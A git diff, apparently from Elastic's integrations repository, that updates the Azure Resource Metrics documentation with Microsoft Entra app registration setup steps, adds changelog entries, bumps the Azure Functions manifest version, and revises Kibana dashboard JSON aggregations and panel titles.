} - ], - "type": "lens" -} \ No newline at end of file diff --git a/packages/azure_functions/manifest.yml b/packages/azure_functions/manifest.yml index b094e9af604..2907f4891b4 100644 --- a/packages/azure_functions/manifest.yml +++ b/packages/azure_functions/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: azure_functions title: "Azure Functions" -version: "0.2.0" +version: "0.4.0" source: license: "Elastic-2.0" description: "Get metrics and logs from Azure Functions" @@ -11,7 +11,7 @@ categories: - cloud conditions: kibana: - version: "^8.8.1" + version: "^8.12.0" elastic: subscription: "basic" vars: diff --git a/packages/azure_metrics/_dev/build/docs/README.md b/packages/azure_metrics/_dev/build/docs/README.md index 46de068f5f5..28a4dab77c4 100644 --- a/packages/azure_metrics/_dev/build/docs/README.md +++ b/packages/azure_metrics/_dev/build/docs/README.md @@ -2,56 +2,187 @@ The [Azure Monitor](https://docs.microsoft.com/en-us/azure/azure-monitor/essentials/data-platform-metrics) feature collects and aggregates logs and metrics from a variety of sources into a common data platform where it can be used for analysis, visualization, and alerting. -The azure monitor metrics are numerical values that describe some aspect of a system at a particular point in time. They are collected at regular intervals and are identified with a timestamp, a name, a value, and one or more defining labels. +The Azure Resource Metrics will periodically retrieve the Azure Monitor metrics using the Azure REST APIs as MetricList. Additional Azure API calls can be used to retrieve information regarding the resources targeted by the user. -The Azure Resource Metrics will periodically retrieve the azure monitor metrics using the Azure REST APIs as MetricList. -Additional azure API calls will be executed in order to retrieve information regarding the resources targeted by the user. +## Data streams + +The Azure Resource Metrics collects one type of data: metrics. + +**Metrics** are numerical values that describe some aspects of a system at a particular point in time. They are collected at regular intervals and are identified with a timestamp, a name, a value, and one or more defining labels. + +The following data streams are available: + +**`monitor`** - Allows users to retrieve metrics from specified resources. Added filters can apply here as the interval of retrieving these metrics, metric names, +aggregation list, namespaces and metric dimensions. The monitor metrics will have a minimum timegrain of 5 minutes, so the `period` for `monitor` dataset should be `300s` or multiples of `300s`. + +**`compute_vm`** - Collects metrics from the virtual machines, these metrics will have a timegrain every 5 minutes, +so the `period` for `compute_vm` should be `300s` or multiples of `300s`. -## Integration specific configuration notes +**`compute_vm_scaleset`** - Collects metrics from the virtual machine scalesets, these metrics will have a timegrain every 5 minutes, +so the `period` for `compute_vm_scaleset` should be `300s` or multiples of `300s`. + +**`storage_account`** - Collects metrics from the storage accounts, these metrics will have a timegrain every 5 minutes, +so the `period` for `storage_account` should be `300s` or multiples of `300s`. + +**`container_instance`** - Collects metrics from specified container groups, these metrics will have a timegrain every 5 minutes, +so the `period` for `container_instance` should be `300s` or multiples of `300s`. + +**`container_registry`** - Collects metrics from the container registries, these metrics will have a timegrain every 5 minutes, +so the `period` for `container_registry` should be `300s` or multiples of `300s`. -All the tasks executed against the Azure Monitor REST API will use the Azure Resource Manager authentication model. -Therefore, all requests must be authenticated with Azure Active Directory (Azure AD). -One approach to authenticate the client application is to create an Azure AD service principal and retrieve the authentication (JWT) token. -For a more detailed walk-through, see: +**`container_service`** - Collects metrics from the container services, these metrics will have a timegrain every 5 minutes, +so the `period` for `container_service` should be `300s` or multiples of `300s`. + +**`database_account`** - Collects relevant metrics from specified database accounts, these metrics will have a timegrain every 5 minutes, +so the `period` for `database_account` should be `300s` or multiples of `300s`. + +For each individual data stream, you can check the exported fields in the [Metrics reference](#metrics-reference) section. + +## Requirements + +The Elastic Agent fetches metric data from the Azure Monitor API and sends it to dedicated data streams named `azure-monitor.-default` in Elasticsearch. + +```text + ┌ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ┐ + + │ ┌─────────────────┐ │ +┌─────────────────┐ │ azure-monitor │ ┌─────────────────┐ +│ Azure API │◀───┼──│ <> │──┼───▶│ Elasticsearch │ +└─────────────────┘ └─────────────────┘ └─────────────────┘ + │ │ + ─ Elastic Agent ─ ─ ─ ─ +``` + +Elastic Agent needs an App Registration to access Azure on your behalf to collect data using the Azure APIs programmatically. + +To use this integration you will need: + +* **Azure App Registration**: You need to set up an Azure App Registration to allow the Agent to access the Azure APIs. See more details in the [Setup section](#setup). +* **Elasticsearch and Kibana**: You need Elasticsearch to store and search your data and Kibana to visualize and manage it. You can use our hosted Elasticsearch Service on Elastic Cloud, which is recommended, the [Native Azure Integration](https://azuremarketplace.microsoft.com/en-us/marketplace/apps/elastic.elasticsearch?tab=Overview), or self-manage the Elastic Stack on your hardware. + + +### Authentication and costs + +**Authentication on the Azure side** +All the tasks executed against the Azure Monitor REST API use the Azure Resource Manager authentication model. Therefore, all requests must be authenticated with Microsoft Entra. +To authenticate the client application, create a Microsoft Entra service principal and retrieve the authentication (JWT) token. For more details, check the following procedures: * [Create an Azure service principal with Azure PowerShell](https://docs.microsoft.com/en-us/powershell/azure/create-azure-service-principal-azureps?view=azps-2.7.0.) -* [Use the portal to create an Azure AD application and service principal that can access resources](https://docs.microsoft.com/en-us/azure/active-directory/develop/howto-create-service-principal-portal). +* [Use the portal to create a Microsoft Entra application and service principal that can access resources](https://docs.microsoft.com/en-us/azure/active-directory/develop/howto-create-service-principal-portal). + +NOTE: When you create an Azure service principal with Azure PowerShell, a linked App Registration is automatically created and is visible on the Azure portal. + +Make sure that the roles assigned to the application contain at least reading permissions to the monitor data. Check [Azure built-in roles](https://docs.microsoft.com/en-us/azure/role-based-access-control/built-in-roles) for more details. -Users will have to make sure the roles assigned to the application contain at least reading permissions to the monitor data. See: [Azure built-in roles](https://docs.microsoft.com/en-us/azure/role-based-access-control/built-in-roles). +**Authentication on the Elastic side** +Elastic handles authentication by creating or renewing the authentication token. It is recommended to use dedicated credentials for Metricbeat only. -Required credentials for the `azure` resource metrics integration: +**Costs** +Metric queries are charged based on the number of standard API calls. +Check [Azure Monitor pricing](https://azure.microsoft.com/en-gb/pricing/details/monitor/) for more detailsgit. -`client_id`:: The unique identifier for the application (also known as Application Id) +## Setup -`client_secret`:: The client/application secret/key +To start collecting data with this integration, you need to: +- Register a new Azure app, by adding credentials, and assigning roles. +- Specify the integration settings in Kibana, which will determine how the integration will access the Azure APIs. -`subscription_id`:: The unique identifier for the azure subscription +### Register a new Azure app -`tenant_id`:: The unique identifier of the Azure Active Directory instance +To register your app, follow these steps: +**Step 1: Create the app registration** -The azure credentials keys can be used if configured `AZURE_CLIENT_ID`, `AZURE_CLIENT_SECRET`, `AZURE_TENANT_ID`, `AZURE_SUBSCRIPTION_ID` +1. Sign in to the [Azure Portal](https://portal.azure.com/). +2. Search for and select **Microsoft Entra ID**. +3. Under **Manage**, select **App registrations** > **New registration**. +4. Enter a display _Name_ for your application (for example, "elastic-agent"). +5. Specify who can use the application. +6. Don't enter anything for _Redirect URI_. This is optional and the agent doesn't use it. +7. Select **Register** to complete the initial app registration. + +Take note of the **Application (client) ID**, which you will use later when specifying the **Client ID** in the integration settings. + +**Step 2: Add credentials** + +Credentials allow your application to access Azure APIs and authenticate itself, requiring no interaction from a user at runtime. + +This integration uses Client Secrets to prove its identity. + +1. In the [Azure Portal](https://portal.azure.com/), select the application you created in the previous section. +1. Select **Certificates & secrets** > **Client secrets** > **New client secret**. +1. Add a description (for example, "Elastic Agent client secrets"). +1. Select an expiration for the secret or specify a custom lifetime. +1. Select **Add**. + +Take note of the content in the **Value** column in the **Client secrets** table, which you will use later when specifying a **Client Secret** in the integration settings. **This secret value is never displayed again after you leave this page.** Record the secret's value in a safe place. + +**Step 3: Assign role** + +1. In the [Azure Portal](https://portal.azure.com/), search for and select **Subscriptions**. +1. Select the subscription to assign the application. +1. Select **Access control (IAM)**. +1. Select **Add** > **Add role assignment** to open the _Add role assignment page_. +1. In the **Role** tab, search and select the role **Monitoring Reader**. +1. Select the **Next** button to move to the **Members** tab. +1. Select **Assign access to** > **User, group, or service principal**, and select **Select members**. This page does not display Microsoft Entra applications in the available options by default. +1. To find your application, search by name (for example, "elastic-agent") and select it from the list. +1. Click the **Select** button. +1. Then click the **Review + assign** button. + +Take note of the following values, which you will use later when specifying settings. + +* `Subscription ID`: use the content of the "Subscription ID" you selected. +* `Tenant ID`: use the "Tenant ID" from the Microsoft Entra you use. + +Your App Registration is now ready for the Elastic Agent. + +### Specify the integration settings in Kibana + +Add the Azure Resource Metrics integration in Kibana and specify settings. + +If you're new to integrations, you can find step-by-step instructions on how to set up an integration in the {{ url "getting-started-observability" "Getting started" }} guide. + +The settings' main section contains all the options needed to access the Azure APIs and collect the monitoring data. You will now use all the values from [App registration](#app-registration) including: + +`Client ID` _string_ +: The unique identifier of the App Registration (sometimes referred to as Application ID). + +`Client Secret` _string_ +: The client secret for authentication. + +`Subscription ID` _string_ +: The unique identifier for the Azure subscription. You can provide just one subscription ID. The Agent uses this ID to access Azure APIs. + +`Tenant ID` _string_ +: The unique identifier of the Microsoft Entra Tenant ID. + +### Advanced options + +There are two additional advanced options: + +`Resource Manager Endpoint` _string_ +: Optional. By default, the integration uses the Azure public environment. To override, users can provide a specific resource manager endpoint to use a different Azure environment. -`resource_manager_endpoint` :: -_string_ -Optional, by default the azure public environment will be used, to override, users can provide a specific resource manager endpoint in order to use a different azure environment. Examples: -* https://management.chinacloudapi.cn for azure ChinaCloud -* https://management.microsoftazure.de for azure GermanCloud -* https://management.azure.com for azure PublicCloud -* https://management.usgovcloudapi.net for azure USGovernmentCloud - -`active_directory_endpoint` :: -_string_ -Optional, by default the associated active directory endpoint to the resource manager endpoint will be used, to override, users can provide a specific active directory endpoint in order to use a different azure environment. + +* `https://management.chinacloudapi.cn` for Azure ChinaCloud +* `https://management.microsoftazure.de` for Azure GermanCloud +* `https://management.azure.com` for Azure PublicCloud +* `https://management.usgovcloudapi.net` for Azure USGovernmentCloud + +` Microsoft Entra Endpoint` _string_ +: Optional. By default, the integration uses the associated Microsoft Entra Endpoint. To override, users can provide a specific active directory endpoint to use a different Azure environment. + Examples: -* https://login.microsoftonline.com for azure ChinaCloud -* https://login.microsoftonline.us for azure GermanCloud -* https://login.chinacloudapi.cn for azure PublicCloud -* https://login.microsoftonline.de for azure USGovernmentCloud -## Data streams +* `https://login.chinacloudapi.cn` for Azure ChinaCloud +* `https://login.microsoftonline.de` for Azure GermanCloud +* `https://login.microsoftonline.com` for Azure PublicCloud +* `https://login.microsoftonline.us` for Azure USGovernmentCloud + +## Metrics reference - `monitor` +`monitor` This data stream allows users to retrieve metrics from specified resources. Added filters can apply here as the interval of retrieving these metrics, metric names, aggregation list, namespaces and metric dimensions. The monitor metrics will have a minimum timegrain of 5 minutes, so the `period` for `monitor` dataset should be `300s` or multiples of `300s`. @@ -98,10 +229,3 @@ This data stream will collect relevant metrics from specified database accounts, so the `period` for `database_account` should be `300s` or multiples of `300s`. {{fields "database_account"}} - -## Additional notes about metrics and costs - -Costs: Metric queries are charged based on the number of standard API calls. -See: [Azure Monitor pricing](https://azure.microsoft.com/en-gb/pricing/details/monitor/). - -Authentication: We are handling authentication on our side (creating/renewing the authentication token), so we advise users to use dedicated credentials for metricbeat only. diff --git a/packages/azure_metrics/changelog.yml b/packages/azure_metrics/changelog.yml index 572dab3bd0f..7ebdf0ec4a6 100644 --- a/packages/azure_metrics/changelog.yml +++ b/packages/azure_metrics/changelog.yml @@ -1,3 +1,23 @@ +- version: "1.5.0" + changes: + - description: Update visualizations of Queue Storage Overview, Table Storage Overview, File Storage Overview & Storage Overview dashboards. + type: enhancement + link: https://github.com/elastic/integrations/pull/9502 +- version: "1.4.4" + changes: + - description: Migrate Blob Storage Overview dashboard to lens. + type: enhancement + link: https://github.com/elastic/integrations/pull/9503 +- version: "1.4.3" + changes: + - description: Remove suffix from Compute VMs Overview dashboard. + type: enhancement + link: https://github.com/elastic/integrations/pull/9445 +- version: "1.4.2" + changes: + - description: Apply documentation guidelines and add generic setup section to Azure Resource Metrics. + type: enhancement + link: https://github.com/elastic/integrations/pull/9065 - version: "1.4.1" changes: - description: Expand Azure guest metrics section. diff --git a/packages/azure_metrics/docs/README.md b/packages/azure_metrics/docs/README.md index e81177c0808..b7c32cc52d3 100644 --- a/packages/azure_metrics/docs/README.md +++ b/packages/azure_metrics/docs/README.md @@ -2,56 +2,187 @@ The [Azure Monitor](https://docs.microsoft.com/en-us/azure/azure-monitor/essentials/data-platform-metrics) feature collects and aggregates logs and metrics from a variety of sources into a common data platform where it can be used for analysis, visualization, and alerting. -The azure monitor metrics are numerical values that describe some aspect of a system at a particular point in time. They are collected at regular intervals and are identified with a timestamp, a name, a value, and one or more defining labels. +The Azure Resource Metrics will periodically retrieve the Azure Monitor metrics using the Azure REST APIs as MetricList. Additional Azure API calls can be used to retrieve information regarding the resources targeted by the user. -The Azure Resource Metrics will periodically retrieve the azure monitor metrics using the Azure REST APIs as MetricList. -Additional azure API calls will be executed in order to retrieve information regarding the resources targeted by the user. +## Data streams + +The Azure Resource Metrics collects one type of data: metrics. + +**Metrics** are numerical values that describe some aspects of a system at a particular point in time. They are collected at regular intervals and are identified with a timestamp, a name, a value, and one or more defining labels. + +The following data streams are available: + +**`monitor`** - Allows users to retrieve metrics from specified resources. Added filters can apply here as the interval of retrieving these metrics, metric names, +aggregation list, namespaces and metric dimensions. The monitor metrics will have a minimum timegrain of 5 minutes, so the `period` for `monitor` dataset should be `300s` or multiples of `300s`. + +**`compute_vm`** - Collects metrics from the virtual machines, these metrics will have a timegrain every 5 minutes, +so the `period` for `compute_vm` should be `300s` or multiples of `300s`. -## Integration specific configuration notes +**`compute_vm_scaleset`** - Collects metrics from the virtual machine scalesets, these metrics will have a timegrain every 5 minutes, +so the `period` for `compute_vm_scaleset` should be `300s` or multiples of `300s`. + +**`storage_account`** - Collects metrics from the storage accounts, these metrics will have a timegrain every 5 minutes, +so the `period` for `storage_account` should be `300s` or multiples of `300s`. + +**`container_instance`** - Collects metrics from specified container groups, these metrics will have a timegrain every 5 minutes, +so the `period` for `container_instance` should be `300s` or multiples of `300s`. + +**`container_registry`** - Collects metrics from the container registries, these metrics will have a timegrain every 5 minutes, +so the `period` for `container_registry` should be `300s` or multiples of `300s`. -All the tasks executed against the Azure Monitor REST API will use the Azure Resource Manager authentication model. -Therefore, all requests must be authenticated with Azure Active Directory (Azure AD). -One approach to authenticate the client application is to create an Azure AD service principal and retrieve the authentication (JWT) token. -For a more detailed walk-through, see: +**`container_service`** - Collects metrics from the container services, these metrics will have a timegrain every 5 minutes, +so the `period` for `container_service` should be `300s` or multiples of `300s`. + +**`database_account`** - Collects relevant metrics from specified database accounts, these metrics will have a timegrain every 5 minutes, +so the `period` for `database_account` should be `300s` or multiples of `300s`. + +For each individual data stream, you can check the exported fields in the [Metrics reference](#metrics-reference) section. + +## Requirements + +The Elastic Agent fetches metric data from the Azure Monitor API and sends it to dedicated data streams named `azure-monitor.-default` in Elasticsearch. + +```text + ┌ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ┐ + + │ ┌─────────────────┐ │ +┌─────────────────┐ │ azure-monitor │ ┌─────────────────┐ +│ Azure API │◀───┼──│ <> │──┼───▶│ Elasticsearch │ +└─────────────────┘ └─────────────────┘ └─────────────────┘ + │ │ + ─ Elastic Agent ─ ─ ─ ─ +``` + +Elastic Agent needs an App Registration to access Azure on your behalf to collect data using the Azure APIs programmatically. + +To use this integration you will need: + +* **Azure App Registration**: You need to set up an Azure App Registration to allow the Agent to access the Azure APIs. See more details in the [Setup section](#setup). +* **Elasticsearch and Kibana**: You need Elasticsearch to store and search your data and Kibana to visualize and manage it. You can use our hosted Elasticsearch Service on Elastic Cloud, which is recommended, the [Native Azure Integration](https://azuremarketplace.microsoft.com/en-us/marketplace/apps/elastic.elasticsearch?tab=Overview), or self-manage the Elastic Stack on your hardware. + + +### Authentication and costs + +**Authentication on the Azure side** +All the tasks executed against the Azure Monitor REST API use the Azure Resource Manager authentication model. Therefore, all requests must be authenticated with Microsoft Entra. +To authenticate the client application, create a Microsoft Entra service principal and retrieve the authentication (JWT) token. For more details, check the following procedures: * [Create an Azure service principal with Azure PowerShell](https://docs.microsoft.com/en-us/powershell/azure/create-azure-service-principal-azureps?view=azps-2.7.0.) -* [Use the portal to create an Azure AD application and service principal that can access resources](https://docs.microsoft.com/en-us/azure/active-directory/develop/howto-create-service-principal-portal). +* [Use the portal to create a Microsoft Entra application and service principal that can access resources](https://docs.microsoft.com/en-us/azure/active-directory/develop/howto-create-service-principal-portal). + +NOTE: When you create an Azure service principal with Azure PowerShell, a linked App Registration is automatically created and is visible on the Azure portal. + +Make sure that the roles assigned to the application contain at least reading permissions to the monitor data. Check [Azure built-in roles](https://docs.microsoft.com/en-us/azure/role-based-access-control/built-in-roles) for more details. -Users will have to make sure the roles assigned to the application contain at least reading permissions to the monitor data. See: [Azure built-in roles](https://docs.microsoft.com/en-us/azure/role-based-access-control/built-in-roles). +**Authentication on the Elastic side** +Elastic handles authentication by creating or renewing the authentication token. It is recommended to use dedicated credentials for Metricbeat only. -Required credentials for the `azure` resource metrics integration: +**Costs** +Metric queries are charged based on the number of standard API calls. +Check [Azure Monitor pricing](https://azure.microsoft.com/en-gb/pricing/details/monitor/) for more detailsgit. -`client_id`:: The unique identifier for the application (also known as Application Id) +## Setup -`client_secret`:: The client/application secret/key +To start collecting data with this integration, you need to: +- Register a new Azure app, by adding credentials, and assigning roles. +- Specify the integration settings in Kibana, which will determine how the integration will access the Azure APIs. -`subscription_id`:: The unique identifier for the azure subscription +### Register a new Azure app -`tenant_id`:: The unique identifier of the Azure Active Directory instance +To register your app, follow these steps: +**Step 1: Create the app registration** -The azure credentials keys can be used if configured `AZURE_CLIENT_ID`, `AZURE_CLIENT_SECRET`, `AZURE_TENANT_ID`, `AZURE_SUBSCRIPTION_ID` +1. Sign in to the [Azure Portal](https://portal.azure.com/). +2. Search for and select **Microsoft Entra ID**. +3. Under **Manage**, select **App registrations** > **New registration**. +4. Enter a display _Name_ for your application (for example, "elastic-agent"). +5. Specify who can use the application. +6. Don't enter anything for _Redirect URI_. This is optional and the agent doesn't use it. +7. Select **Register** to complete the initial app registration. + +Take note of the **Application (client) ID**, which you will use later when specifying the **Client ID** in the integration settings. + +**Step 2: Add credentials** + +Credentials allow your application to access Azure APIs and authenticate itself, requiring no interaction from a user at runtime. + +This integration uses Client Secrets to prove its identity. + +1. In the [Azure Portal](https://portal.azure.com/), select the application you created in the previous section. +1. Select **Certificates & secrets** > **Client secrets** > **New client secret**. +1. Add a description (for example, "Elastic Agent client secrets"). +1. Select an expiration for the secret or specify a custom lifetime. +1. Select **Add**. + +Take note of the content in the **Value** column in the **Client secrets** table, which you will use later when specifying a **Client Secret** in the integration settings. **This secret value is never displayed again after you leave this page.** Record the secret's value in a safe place. + +**Step 3: Assign role** + +1. In the [Azure Portal](https://portal.azure.com/), search for and select **Subscriptions**. +1. Select the subscription to assign the application. +1. Select **Access control (IAM)**. +1. Select **Add** > **Add role assignment** to open the _Add role assignment page_. +1. In the **Role** tab, search and select the role **Monitoring Reader**. +1. Select the **Next** button to move to the **Members** tab. +1. Select **Assign access to** > **User, group, or service principal**, and select **Select members**. This page does not display Microsoft Entra applications in the available options by default. +1. To find your application, search by name (for example, "elastic-agent") and select it from the list. +1. Click the **Select** button. +1. Then click the **Review + assign** button. + +Take note of the following values, which you will use later when specifying settings. + +* `Subscription ID`: use the content of the "Subscription ID" you selected. +* `Tenant ID`: use the "Tenant ID" from the Microsoft Entra you use. + +Your App Registration is now ready for the Elastic Agent. + +### Specify the integration settings in Kibana + +Add the Azure Resource Metrics integration in Kibana and specify settings. + +If you're new to integrations, you can find step-by-step instructions on how to set up an integration in the [Getting started](https://www.elastic.co/guide/en/welcome-to-elastic/current/getting-started-observability.html) guide. + +The settings' main section contains all the options needed to access the Azure APIs and collect the monitoring data. You will now use all the values from [App registration](#app-registration) including: + +`Client ID` _string_ +: The unique identifier of the App Registration (sometimes referred to as Application ID). + +`Client Secret` _string_ +: The client secret for authentication. + +`Subscription ID` _string_ +: The unique identifier for the Azure subscription. You can provide just one subscription ID. The Agent uses this ID to access Azure APIs. + +`Tenant ID` _string_ +: The unique identifier of the Microsoft Entra Tenant ID. + +### Advanced options + +There are two additional advanced options: + +`Resource Manager Endpoint` _string_ +: Optional. By default, the integration uses the Azure public environment. To override, users can provide a specific resource manager endpoint to use a different Azure environment. -`resource_manager_endpoint` :: -_string_ -Optional, by default the azure public environment will be used, to override, users can provide a specific resource manager endpoint in order to use a different azure environment. Examples: -* https://management.chinacloudapi.cn for azure ChinaCloud -* https://management.microsoftazure.de for azure GermanCloud -* https://management.azure.com for azure PublicCloud -* https://management.usgovcloudapi.net for azure USGovernmentCloud - -`active_directory_endpoint` :: -_string_ -Optional, by default the associated active directory endpoint to the resource manager endpoint will be used, to override, users can provide a specific active directory endpoint in order to use a different azure environment. + +* `https://management.chinacloudapi.cn` for Azure ChinaCloud +* `https://management.microsoftazure.de` for Azure GermanCloud +* `https://management.azure.com` for Azure PublicCloud +* `https://management.usgovcloudapi.net` for Azure USGovernmentCloud + +` Microsoft Entra Endpoint` _string_ +: Optional. By default, the integration uses the associated Microsoft Entra Endpoint. To override, users can provide a specific active directory endpoint to use a different Azure environment. + Examples: -* https://login.microsoftonline.com for azure ChinaCloud -* https://login.microsoftonline.us for azure GermanCloud -* https://login.chinacloudapi.cn for azure PublicCloud -* https://login.microsoftonline.de for azure USGovernmentCloud -## Data streams +* `https://login.chinacloudapi.cn` for Azure ChinaCloud +* `https://login.microsoftonline.de` for Azure GermanCloud +* `https://login.microsoftonline.com` for Azure PublicCloud +* `https://login.microsoftonline.us` for Azure USGovernmentCloud + +## Metrics reference - `monitor` +`monitor` This data stream allows users to retrieve metrics from specified resources. Added filters can apply here as the interval of retrieving these metrics, metric names, aggregation list, namespaces and metric dimensions. The monitor metrics will have a minimum timegrain of 5 minutes, so the `period` for `monitor` dataset should be `300s` or multiples of `300s`. @@ -631,10 +762,3 @@ so the `period` for `database_account` should be `300s` or multiples of `300s`. | service.address | Service address | keyword | | | service.type | The type of the service data is collected from. The type can be used to group and correlate logs and metrics from one service type. Example: If logs or metrics are collected from Elasticsearch, `service.type` would be `elasticsearch`. | keyword | | - -## Additional notes about metrics and costs - -Costs: Metric queries are charged based on the number of standard API calls. -See: [Azure Monitor pricing](https://azure.microsoft.com/en-gb/pricing/details/monitor/). - -Authentication: We are handling authentication on our side (creating/renewing the authentication token), so we advise users to use dedicated credentials for metricbeat only. diff --git a/packages/azure_metrics/img/azure_metrics-storage-account-overview.png b/packages/azure_metrics/img/azure_metrics-storage-account-overview.png index 2ac54ab5068..922fee68b90 100644 Binary files a/packages/azure_metrics/img/azure_metrics-storage-account-overview.png and b/packages/azure_metrics/img/azure_metrics-storage-account-overview.png differ diff --git a/packages/azure_metrics/img/azure_metrics-vm-overview.png b/packages/azure_metrics/img/azure_metrics-vm-overview.png index 1b5422120d8..dc79a4bfa70 100644 Binary files a/packages/azure_metrics/img/azure_metrics-vm-overview.png and b/packages/azure_metrics/img/azure_metrics-vm-overview.png differ diff --git a/packages/azure_metrics/kibana/dashboard/azure_metrics-10efa340-32f8-11ea-a83e-25b8612d00cc.json b/packages/azure_metrics/kibana/dashboard/azure_metrics-10efa340-32f8-11ea-a83e-25b8612d00cc.json index 43312596159..0e835d49e66 100644 --- a/packages/azure_metrics/kibana/dashboard/azure_metrics-10efa340-32f8-11ea-a83e-25b8612d00cc.json +++ b/packages/azure_metrics/kibana/dashboard/azure_metrics-10efa340-32f8-11ea-a83e-25b8612d00cc.json @@ -49,6 +49,7 @@ { "embeddableConfig": { "enhancements": {}, + "hidePanelTitles": false, "savedVis": { "data": { "aggs": [], @@ -66,7 +67,7 @@ "markdown": "### Azure Storage\n\n[Overview](#/dashboard/azure_metrics-1a151f80-32db-11ea-a83e-25b8612d00cc) | [Blob](#/dashboard/azure_metrics-b165ef60-32f7-11ea-a83e-25b8612d00cc) | [File](#/dashboard/azure_metrics-dff7a080-32f7-11ea-a83e-25b8612d00cc) | [Table](#/dashboard/azure_metrics-ff2fe020-32f7-11ea-a83e-25b8612d00cc) | [**Queue**](#/dashboard/azure_metrics-10efa340-32f8-11ea-a83e-25b8612d00cc) ", "openLinksInNewTab": false }, - "title": "Navigation Queue Storage Overview [Azure Metrics]", + "title": "Navigation Queue Storage Overview", "type": "markdown", "uiState": {} } @@ -79,6 +80,7 @@ "y": 0 }, "panelIndex": "933a427d-a8b7-48ff-ac53-337f32b340ea", + "title": "Navigation Queue Storage Overview", "type": "visualization", "version": "8.7.0" }, @@ -120,12 +122,12 @@ }, "isBucketed": false, "label": "Queue Capacity", - "operationType": "average", + "operationType": "last_value", "params": { - "emptyAsNull": true, "format": { "id": "bytes" - } + }, + "sortField": "@timestamp" }, "scale": "ratio", "sourceField": "azure.storage_account.queue_capacity.avg" @@ -133,10 +135,10 @@ "9c38f7a6-3d0e-42ea-818e-c7b3503cac99": { "dataType": "number", "isBucketed": false, - "label": "overall_max(average(azure.storage_account.queue_capacity.avg))", + "label": "overall_max(last_value(azure.storage_account.queue_capacity.avg))", "operationType": "formula", "params": { - "formula": "overall_max(average(azure.storage_account.queue_capacity.avg))", + "formula": "overall_max(last_value(azure.storage_account.queue_capacity.avg))", "isFormulaBroken": false }, "references": [ @@ -147,11 +149,15 @@ "9c38f7a6-3d0e-42ea-818e-c7b3503cac99X0": { "customLabel": true, "dataType": "number", + "filter": { + "language": "kuery", + "query": "azure.storage_account.queue_capacity.avg: *" + }, "isBucketed": false, - "label": "Part of overall_max(average(azure.storage_account.queue_capacity.avg))", - "operationType": "average", + "label": "Part of overall_max(last_value(azure.storage_account.queue_capacity.avg))", + "operationType": "last_value", "params": { - "emptyAsNull": false + "sortField": "@timestamp" }, "scale": "ratio", "sourceField": "azure.storage_account.queue_capacity.avg" @@ -160,7 +166,7 @@ "customLabel": true, "dataType": "number", "isBucketed": false, - "label": "Part of overall_max(average(azure.storage_account.queue_capacity.avg))", + "label": "Part of overall_max(last_value(azure.storage_account.queue_capacity.avg))", "operationType": "overall_max", "references": [ "9c38f7a6-3d0e-42ea-818e-c7b3503cac99X0" @@ -196,7 +202,7 @@ "metricAccessor": "487171cd-7adb-4fe6-ac1b-af81610bb835" } }, - "title": "Storage Queue Capacity [Azure Metrics] (converted)", + "title": "Storage Queue Capacity", "type": "lens", "visualizationType": "lnsMetric" }, @@ -211,7 +217,7 @@ "y": 5 }, "panelIndex": "0b4107a7-6a3d-4092-9813-00edb56bc838", - "title": "Storage Queue Capacity [Azure Metrics]", + "title": "Storage Queue Capacity", "type": "lens", "version": "8.7.0" }, @@ -247,10 +253,10 @@ "4a919315-6965-4448-b506-d4e41d5e4da2": { "dataType": "number", "isBucketed": false, - "label": "overall_max(average(azure.storage_account.queue_message_count.avg))", + "label": "overall_max(last_value(azure.storage_account.queue_message_count.avg))", "operationType": "formula", "params": { - "formula": "overall_max(average(azure.storage_account.queue_message_count.avg))", + "formula": "overall_max(last_value(azure.storage_account.queue_message_count.avg))", "isFormulaBroken": false }, "references": [ @@ -261,11 +267,15 @@ "4a919315-6965-4448-b506-d4e41d5e4da2X0": { "customLabel": true, "dataType": "number", + "filter": { + "language": "kuery", + "query": "azure.storage_account.queue_message_count.avg: *" + }, "isBucketed": false, - "label": "Part of overall_max(average(azure.storage_account.queue_message_count.avg))", - "operationType": "average", + "label": "Part of overall_max(last_value(azure.storage_account.queue_message_count.avg))", + "operationType": "last_value", "params": { - "emptyAsNull": false + "sortField": "@timestamp" }, "scale": "ratio", "sourceField": "azure.storage_account.queue_message_count.avg" @@ -274,7 +284,7 @@ "customLabel": true, "dataType": "number", "isBucketed": false, - "label": "Part of overall_max(average(azure.storage_account.queue_message_count.avg))", + "label": "Part of overall_max(last_value(azure.storage_account.queue_message_count.avg))", "operationType": "overall_max", "references": [ "4a919315-6965-4448-b506-d4e41d5e4da2X0" @@ -290,12 +300,12 @@ }, "isBucketed": false, "label": "Queue Message Count", - "operationType": "average", + "operationType": "last_value", "params": { - "emptyAsNull": true, "format": { "id": "number" - } + }, + "sortField": "@timestamp" }, "scale": "ratio", "sourceField": "azure.storage_account.queue_message_count.avg" @@ -329,7 +339,7 @@ "metricAccessor": "72960318-f3b9-47a4-bce5-c75234290760" } }, - "title": "Storage Queue Message Count [Azure Metrics] (converted)", + "title": "Storage Queue Message Count", "type": "lens", "visualizationType": "lnsMetric" }, @@ -344,7 +354,7 @@ "y": 5 }, "panelIndex": "cf022a47-2314-4ab6-b397-b1d860944179", - "title": "Storage Queue Message Count [Azure Metrics]", + "title": "Storage Queue Message Count", "type": "lens", "version": "8.7.0" }, @@ -380,10 +390,10 @@ "59f2bee0-1a09-4b55-8016-14ee3cd01079": { "dataType": "number", "isBucketed": false, - "label": "overall_max(average(azure.storage_account.queue_count.avg))", + "label": "overall_max(last_value(azure.storage_account.queue_count.avg))", "operationType": "formula", "params": { - "formula": "overall_max(average(azure.storage_account.queue_count.avg))", + "formula": "overall_max(last_value(azure.storage_account.queue_count.avg))", "isFormulaBroken": false }, "references": [ @@ -394,11 +404,15 @@ "59f2bee0-1a09-4b55-8016-14ee3cd01079X0": { "customLabel": true, "dataType": "number", + "filter": { + "language": "kuery", + "query": "azure.storage_account.queue_count.avg: *" + }, "isBucketed": false, - "label": "Part of overall_max(average(azure.storage_account.queue_count.avg))", - "operationType": "average", + "label": "Part of overall_max(last_value(azure.storage_account.queue_count.avg))", + "operationType": "last_value", "params": { - "emptyAsNull": false + "sortField": "@timestamp" }, "scale": "ratio", "sourceField": "azure.storage_account.queue_count.avg" @@ -407,7 +421,7 @@ "customLabel": true, "dataType": "number", "isBucketed": false, - "label": "Part of overall_max(average(azure.storage_account.queue_count.avg))", + "label": "Part of overall_max(last_value(azure.storage_account.queue_count.avg))", "operationType": "overall_max", "references": [ 